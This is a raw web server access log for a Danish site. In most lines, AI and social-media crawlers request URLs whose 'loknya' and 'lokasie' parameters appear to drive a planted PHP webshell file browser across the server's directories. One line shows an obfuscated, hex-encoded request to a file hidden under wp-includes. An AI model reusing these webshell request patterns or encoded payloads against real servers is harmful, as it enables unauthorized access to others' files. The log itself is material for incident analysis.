74.7.227.174 - - [29/Jul/2026:07:29:39 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4/3 HTTP/2" 200 2095 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
185.21.40.28 - - [29/Jul/2026:07:27:39 +0200] "GET /wp-includes/SimplePie/library/SimplePie/Net/Net/index.php?ARRAY=7o2230223n313738353330363435392p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353330323835392q6361613133373939646330333336316630343961353465393830323531326139222p2232223n223035353065336239323162373134656535373262646164306539663230643661222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34382q35392q36342q37342q38362q3131227q HTTP/1.1" 500 567 "-" "-"
74.7.227.174 - - [29/Jul/2026:07:29:40 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4/5 HTTP/2" 200 2128 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:40 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/1/3/1/13147f86590c2714&loknya=/var/www/vhosts/store-bors.dk/lscache/1/3/1 HTTP/2" 200 19560 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/1/3/1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:40 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4/1 HTTP/2" 200 2134 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:40 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/8/1/3/8130c0b65695ada1&loknya=/var/www/vhosts/store-bors.dk/lscache/8/1/3 HTTP/2" 200 25799 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/8/1/3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:41 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/3/2 HTTP/2" 200 2043 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:41 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/0/9/6/09686ff4411595d5&loknya=/var/www/vhosts/store-bors.dk/lscache/0/9/6 HTTP/2" 200 25854 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/0/9/6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:41 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./././././lscache/c/2/8/c28afeb6a7b5bba4&loknya=/var/www/vhosts/store-bors.dk/./././././lscache/c/2/8 HTTP/2" 200 25850 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/c/2/8" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:42 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/1/3/1/131bc043d269902d&loknya=/var/www/vhosts/store-bors.dk/lscache/1/3/1 HTTP/2" 200 25741 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/1/3/1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:42 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./././././lscache/e/3/3/e33898f59fb21218&loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/3/3 HTTP/2" 200 21917 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/3/3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:07:29:42 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F6%2F5%2Fd HTTP/2" 200 1999 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:07:29:43 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/0/9/6/096e2666e9e954a8&loknya=/var/www/vhosts/store-bors.dk/lscache/0/9/6 HTTP/2" 200 25798 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/0/9/6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:43 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/d/2/1 HTTP/2" 200 2041 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/d/2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:43 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/9/2/8 HTTP/2" 200 2086 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/9/2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:43 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/5/c/4 HTTP/2" 200 1988 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/5/c" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:44 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/1/0/9 HTTP/2" 200 1969 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/1/0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:44 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4/2 HTTP/2" 200 2039 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:44 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/1/3/5 HTTP/2" 200 1985 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/1/3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:45 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/3/9 HTTP/2" 200 1983 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:45 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/4/6/6 HTTP/2" 200 1794 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/4/6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:45 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/5/4/6 HTTP/2" 200 2029 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/5/4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:45 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4/8 HTTP/2" 200 1989 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:46 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/1/4/5 HTTP/2" 200 1975 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/1/4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:46 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./././././lscache/e/4/3/e4366f59f8c58902&loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4/3 HTTP/2" 200 25939 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4/3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:46 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/0/5/6 HTTP/2" 200 1967 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/0/5" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:46 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./././././lscache/e/4/5/e45e61e6c75982a2&loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4/5 HTTP/2" 200 1852 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4/5" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:47 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/5/0/0 HTTP/2" 200 1974 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/5/0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:47 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./././././lscache/e/4/1/e4135b32b418ab46&loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4/1 HTTP/2" 200 20401 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4/1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:07:29:47 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F1%2Ff%2F9 HTTP/2" 200 2033 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:07:29:47 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/3/6/1 HTTP/2" 200 1977 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/3/6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:48 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./././././lscache/e/4/5/e4575af22b851900&loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4/5 HTTP/2" 200 25854 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4/5" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:48 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/4/1/4 HTTP/2" 200 1975 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/4/1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:48 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./././././lscache/e/3/2/e32407520ed49a07&loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/3/2 HTTP/2" 200 1866 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/3/2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:48 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/0/4/2 HTTP/2" 200 2037 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/0/4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:49 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./././././lscache/e/4/3/e4360071a8811fc1&loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4/3 HTTP/2" 200 1842 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4/3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:49 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/9/2/8/9286f05042ddf2bf&loknya=/var/www/vhosts/store-bors.dk/lscache/9/2/8 HTTP/2" 200 22112 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/9/2/8" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:49 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./././././lscache/d/2/1/d213b60f495421dd&loknya=/var/www/vhosts/store-bors.dk/./././././lscache/d/2/1 HTTP/2" 200 19677 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/d/2/1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:50 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/9/2/8/9287b3cd9f15b078&loknya=/var/www/vhosts/store-bors.dk/lscache/9/2/8 HTTP/2" 200 25838 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/9/2/8" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:50 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./././././lscache/d/2/1/d21af416ff981161&loknya=/var/www/vhosts/store-bors.dk/./././././lscache/d/2/1 HTTP/2" 200 1861 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/d/2/1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:50 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/1/0/9/1091405dcb431805&loknya=/var/www/vhosts/store-bors.dk/lscache/1/0/9 HTTP/2" 200 25826 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/1/0/9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
57.141.0.2 - - [29/Jul/2026:07:29:50 +0200] "GET /post-sitemap.xml?lokasie=/var/www/vhosts/store-bors.dk/httpdocs/wp-content/languages/en_CA-9c3519f4870fac83dc0dbf18cb6bd4c4.json&loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-content/languages HTTP/2" 200 2000 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:147.0) Gecko/20100101 Firefox/147.0 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
74.7.227.174 - - [29/Jul/2026:07:29:51 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/c/2/1 HTTP/2" 200 2093 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/c/2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:51 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/9/2/8/92812898ad88a575&loknya=/var/www/vhosts/store-bors.dk/lscache/9/2/8 HTTP/2" 200 1841 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/9/2/8" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
57.141.0.64 - - [29/Jul/2026:07:29:51 +0200] "GET /post-sitemap.xml?lokasie=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/js/customize-models.js&loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/js HTTP/2" 200 3917 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
74.7.227.174 - - [29/Jul/2026:07:29:51 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./././././lscache/e/3/9/e39f743963d0e613&loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/3/9 HTTP/2" 200 25855 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/3/9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:52 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/5/4/6/546f98a05f0db513&loknya=/var/www/vhosts/store-bors.dk/lscache/5/4/6 HTTP/2" 200 25797 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/5/4/6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:52 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/c/2/3 HTTP/2" 200 2090 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/c/2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:52 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/1/3/5/135335ae81957145&loknya=/var/www/vhosts/store-bors.dk/lscache/1/3/5 HTTP/2" 200 19693 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/1/3/5" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:52 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/3/5 HTTP/2" 200 2051 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:07:29:52 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Ff%2F1%2F9 HTTP/2" 200 1986 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:07:29:53 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/5/4/6/54669c36682da8f5&loknya=/var/www/vhosts/store-bors.dk/lscache/5/4/6 HTTP/2" 200 19684 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/5/4/6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:53 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/c/2/4 HTTP/2" 200 1990 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/c/2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:53 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/1/a/7 HTTP/2" 200 1991 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/1/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:53 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/5/0/0/500bc3100e484132&loknya=/var/www/vhosts/store-bors.dk/lscache/5/0/0 HTTP/2" 200 19676 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/5/0/0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:54 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/1/a/4 HTTP/2" 200 2043 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/1/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:54 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/3/6/1/3617a21ac3b25156&loknya=/var/www/vhosts/store-bors.dk/lscache/3/6/1 HTTP/2" 200 25822 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/3/6/1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:55 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/3/1 HTTP/2" 200 2045 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:55 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/4/1/4/414a3d605b7799c8&loknya=/var/www/vhosts/store-bors.dk/lscache/4/1/4 HTTP/2" 200 19706 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/4/1/4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:55 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/1/a/5 HTTP/2" 200 2043 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/1/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:55 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/0/4/2/04200dc78b84474b&loknya=/var/www/vhosts/store-bors.dk/lscache/0/4/2 HTTP/2" 200 20307 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/0/4/2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:56 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4/0 HTTP/2" 200 1977 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:56 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/0/4/2/0421e5e9b06f8171&loknya=/var/www/vhosts/store-bors.dk/lscache/0/4/2 HTTP/2" 200 19732 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/0/4/2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
57.141.0.66 - - [29/Jul/2026:07:29:56 +0200] "GET /category-sitemap.xml?lokasie=/var/www/vhosts/store-bors.dk/httpdocs/wp-admin/css/colors/coffee/colors-rtl.css&loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-admin/css/colors/coffee HTTP/2" 200 6372 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
74.7.227.174 - - [29/Jul/2026:07:29:56 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/1/a/1 HTTP/2" 200 1992 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/1/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:57 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/7/3/5 HTTP/2" 200 1968 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/7/3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:57 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./././././lscache/c/2/1/c21bd75152874a4b&loknya=/var/www/vhosts/store-bors.dk/./././././lscache/c/2/1 HTTP/2" 200 25830 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/c/2/1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
57.141.0.16 - - [29/Jul/2026:07:29:57 +0200] "GET /category-sitemap.xml?loknya=/var/www/vhosts/store-bors.dk/lsahe/7/3/ HTTP/2" 200 1964 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
